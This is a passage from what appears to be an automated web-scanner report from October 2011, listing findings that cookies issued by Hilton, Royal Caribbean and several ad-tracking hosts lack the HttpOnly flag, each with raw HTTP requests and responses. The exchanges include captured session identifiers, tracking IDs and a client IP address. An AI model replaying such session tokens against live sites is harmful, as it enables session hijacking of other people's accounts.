Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/images_unique/blank.gif">here</a>.</body>
12.11. http://www.royalcaribbean.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.royalcaribbean.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.royalcaribbean.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: IBM_HTTP_Server
Location: http://www.royalcaribbean.com/home.do
Content-Length: 0
Content-Type: text/plain
Content-Language: en
Date: Mon, 03 Oct 2011 12:41:00 GMT
Connection: close
Set-Cookie: JSESSIONID=0000Hnty0rieXZnxmfuPhXDAbub:12h3g0fq2; Path=/; Domain=royalcaribbean.com

12.12. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do;jsessionid=89A82514A002A1CE9413C2D5351C2762.etc33?opTitle=hotel_primary_nav_dining&cid=OH,HH,boslh,Dining_Menu_ConnollysF HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=6134AD4FCABA66CF1C1924679BB50856.etc33; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:10 GMT;path=/
Content-Length: 49172


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
12.13. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH/index.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149& HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; NSC_qse-qgt=44153d5f3660; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.996; mmid=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635640479:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:03:14 GMT
Content-Length: 84997
Connection: close
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=E417BA0D4FB61B6C8AB561D3C9970187.etc13; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:14:14 GMT;path=/


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta
...[SNIP]...
12.14. http://www1.hilton.com/en_US/hi/index.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hi/index.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en_US/hi/index.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 59059
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:52:41 GMT
Connection: close
Set-Cookie: JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; Path=/
Set-Cookie: BetaCookie=Y; Domain=.hilton.com; Expires=Tue, 04-Oct-2011 12:52:41 GMT; Path=/en_US
Set-Cookie: BetaCookie=Y; Domain=.hilton.com; Expires=Tue, 04-Oct-2011 12:52:41 GMT; Path=/en
Set-Cookie: cross-sell=hi; Domain=hilton.com; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:03:41 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="msapplication-st
...[SNIP]...
12.15. http://www1.hilton.com/en_US/hi/sitemap/index.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hi/sitemap/index.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en_US/hi/sitemap/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:04:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=1907DCB21C07B2421366C003D9FC39EA.etc62; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:15:10 GMT;path=/
Content-Length: 37911


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="m
...[SNIP]...
12.16. https://wwwa.applyonlinenow.com/USCCapp/Ctl/entry  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://wwwa.applyonlinenow.com
Path:   /USCCapp/Ctl/entry

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /USCCapp/Ctl/entry HTTP/1.1
Host: wwwa.applyonlinenow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Found
Date: Mon, 03 Oct 2011 13:02:36 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2
Location: https://wwwa.applyonlinenow.com/USCCapp/static/error.html?error_code=1001
Content-Length: 0
Set-Cookie: JSESSIONID=0000EGXfhNLdzAH9vr8PmirVHqD:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/plain; charset=ISO-8859-1
Content-Language: en-US

12.17. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www2.ncl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 03 Oct 2011 12:46:52 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Wed, 02-Oct-2013 12:46:52 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;
12.18. http://bstats.adbrite.com/adserver/behavioral-data/0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /adserver/behavioral-data/0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/behavioral-data/0?d=48380967;bapid=12761;uid=1043107 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=2010860;type=2010c219;cat=fl_ho038;ord=5806069097016.007?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; b="%3A%3A13wid%2C13beg%2C15sx4"; vsd=0@1@4e891585@ads.pubmatic.com

Response

HTTP/1.1 200 OK
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: vsd=0@2@4e89aeca@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Wed, 05-Oct-2011 12:47:06 GMT
Content-Type: image/gif
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 03 Oct 2011 12:47:06 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
12.19. http://ctix8.cheaptickets.com/dcsrbjuh3vz5bde9exdeyiy5l_8c1r/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ctix8.cheaptickets.com
Path:   /dcsrbjuh3vz5bde9exdeyiy5l_8c1r/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsrbjuh3vz5bde9exdeyiy5l_8c1r/dcs.gif?&dcsdat=1317645789938&dcssip=vacations.rooms.com&dcsuri=/wthrooms/CPMerchandisingPage&dcsqry=%3FDD=WTHROOMS%26headTemplate=DestinationHotelHead%26bodyTemplate=NewYorkHotelBody%26isShowFramework=true%26WT.mc_id=WTHROOMS_NewYorkHotel_032511&dcsref=http://www.rooms.com/&WT.co_f=50.23.123.106-1472814720.30179680&WT.vt_sid=50.23.123.106-1472814720.30179680.1317645789940&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=7&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Vacation%20Packages&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1074x906&WT.fi=Yes&WT.fv=10.3&WT.tv=8.0.3&WT.sp=@@SPLITVALUE@@&WT.si_n=Package%20Search%20Purchase%20Process&WT.si_p=HP&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f=1&dist=WTHROOMS HTTP/1.1
Host: ctix8.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://vacations.rooms.com/wthrooms/CPMerchandisingPage?DD=WTHROOMS&headTemplate=DestinationHotelHead&bodyTemplate=NewYorkHotelBody&isShowFramework=true&WT.mc_id=WTHROOMS_NewYorkHotel_032511
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317600108626:ss=1317598702061; ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMTQ3MjgxNDcyMC4zMDE3OTY4MAAAAAAAAAADAAAAPXQAAJQIiU6Z/IhO/ucAAAUEiU6D/YhO+XEAAHsJiU4ABIlOAQAAABQuAAB7CYlOmfyITgAAAAA-; MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAzNzE0Mjg0fEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMjA6MDE6NTQgUE18IHwg

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 12:42:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMTQ3MjgxNDcyMC4zMDE3OTY4MAAAAAAAAAAEAAAAPXQAAJQIiU6Z/IhO/ucAAAUEiU6D/YhO+XEAAHsJiU4ABIlOjg0BAMqtiU7KrYlOAQAAABQuAADKrYlOyq2JTgAAAAA-; path=/; expires=Thu, 30-Sep-2021 12:42:50 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;
12.20. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=rylcrbnint_cs=1&betq=805=348090 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=1740393;type=royal441;cat=rccom004;ord=5875754996668.548?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 12:41:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Wed, 02-Oct-2013 12:41:02 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 03 Oct 2011 13:41:02 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
12.21. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://marriottinternationa.tt.omtrdc.net
Path:   /m2/marriottinternationa/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/marriottinternationa/mbox/standard?mboxHost=www.marriott.com&mboxSession=1317646533235-184575&mboxPage=1317646533235-184575&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=marriott.com_%2Fdefault.mi_TopOfPage&mboxId=0&mboxTime=1317628533254&mboxURL=http%3A%2F%2Fwww.marriott.com%2Fdefault.mi&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: marriottinternationa.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317646533235-184575.19; Domain=marriottinternationa.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:55:32 GMT; Path=/m2/marriottinternationa
Content-Type: text/javascript
Content-Length: 16822
Date: Mon, 03 Oct 2011 12:55:32 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('marriott.com_/default.mi_TopOfPage',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mb
...[SNIP]...
12.22. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/sc/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://marriottinternationa.tt.omtrdc.net
Path:   /m2/marriottinternationa/sc/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/marriottinternationa/sc/standard?mboxHost=www.marriott.com&mboxSession=1317646533235-184575&mboxPage=1317646533235-184575&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=2&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1317628536446&charSet=UTF-8&cookieDomainPeriods=2&pageName=www.marriott.com%2Fdefault.mi&resolution=1920x1200&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkTrackVars=None&linkTrackEvents=None&prop5=US&prop8=Weekday%20%3A%20Monday%20%3A%208%3A30AM&eVar15=Weekday%20%3A%20Monday%20%3A%208%3A30AM&eVar35=First%20Visit&eVar41=US&mboxURL=http%3A%2F%2Fwww.marriott.com%2Fdefault.mi&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: marriottinternationa.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1317646533235-184575; mboxPC=1317646533235-184575.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317646533235-184575.19; Domain=marriottinternationa.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:55:40 GMT; Path=/m2/marriottinternationa
Content-Length: 220
Date: Mon, 03 Oct 2011 12:55:39 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1317646533235-184575.19");mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferD
...[SNIP]...
12.23. http://o.opentable.com/b/ss/otcom/1/H.22.1--NS/0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.opentable.com
Path:   /b/ss/otcom/1/H.22.1--NS/0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/otcom/1/H.22.1--NS/0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: o.opentable.com

Response

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 12:57:36 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]; Expires=Sat, 1 Oct 2016 12:57:36 GMT; Domain=.opentable.com; Path=/
Location: http://o.opentable.com/b/ss/otcom/1/H.22.1--NS/0?AQB=1&pccr=true&vidn=2744D8A0051597FB-40000176E00002C7&g=none&AQE=1
X-C: ms-4.5
Expires: Sun, 02 Oct 2011 12:57:36 GMT
Last-Modified: Tue, 04 Oct 2011 12:57:36 GMT
Cache-Control: no-cache, no-store, max-age=0, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www383
Content-Length: 0
Content-Type: text/plain

12.24. http://opentable.tt.omtrdc.net/m2/opentable/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://opentable.tt.omtrdc.net
Path:   /m2/opentable/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/opentable/mbox/standard?mboxHost=www.opentable.com&mboxSession=1317646507167-573607&mboxPage=1317646507167-573607&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=x-only&mboxCount=1&mbox=mboxInterimTrack&mboxId=0&mboxTime=1317628507182&mboxURL=http%3A%2F%2Fwww.opentable.com%2Finterim.aspx%3Frid%3D90%26restref%3D90%26m%3D4%26t%3Dsingle%26p%3D2%26d%3D10%2F3%2F2011%25207%3A00%2520PM%26rtype%3Dism_mod&mboxReferrer=http%3A%2F%2Fwww.grandcafe-sf.com%2F&mboxVersion=40 HTTP/1.1
Host: opentable.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317646507167-573607.19; Domain=opentable.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:54:46 GMT; Path=/m2/opentable
Content-Type: text/javascript
Content-Length: 97
Date: Mon, 03 Oct 2011 12:54:46 GMT
Server: Test & Target

mboxFactories.get('default').get('mboxInterimTrack',0).setOffer(new mboxOfferDefault()).loaded();
12.25. http://pixel.traveladvertising.com/Live/Pixel.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.traveladvertising.com
Path:   /Live/Pixel.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Live/Pixel.aspx?PlacementId=49766 HTTP/1.1
Host: pixel.traveladvertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=2010860;type=2010c219;cat=fl_ho038;ord=5806069097016.007?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: private, max-age=0
Content-Type: image/gif
Expires: Mon, 03 Oct 2011 12:47:07 GMT
Last-Modified: Mon, 03 Oct 2011 12:47:07 GMT
Location: http://ad.doubleclick.net/activity;src=3076867;type=celeb160;cat=celeb306;qty=1;cost=[Revenue]
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: tan_ct_49751=49751;Path=/;Domain=.traveladvertising.com;Expires=Sun, 01-Jan-2012 12:47:07 GMT
Set-Cookie: CookieId=18998dfb36064146bfba3fde05c02559;Path=/;Domain=.traveladvertising.com;Expires=Sun, 27-Jun-2060 12:47:07 GMT
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........L..;
12.26. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?b2=1a-ycFsYb7TPva7ipM_9UQiCOoCfqyV9O_WTqaUZ19Kh5cu-MqDYZ3Xj0IBYf-bfGeIFKTNd3xzB36jrZoq6uw&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=2010860;type=2010c219;cat=fl_ho038;ord=5806069097016.007?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C5%7C1002%7C5%7C1004%7C9%7C6%7C3; rds=15231%7C15228%7C15250%7C15249%7C15250%7C15250%7C15228%7C15231%7C15248; rv=1; uid=2944787775510337379

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
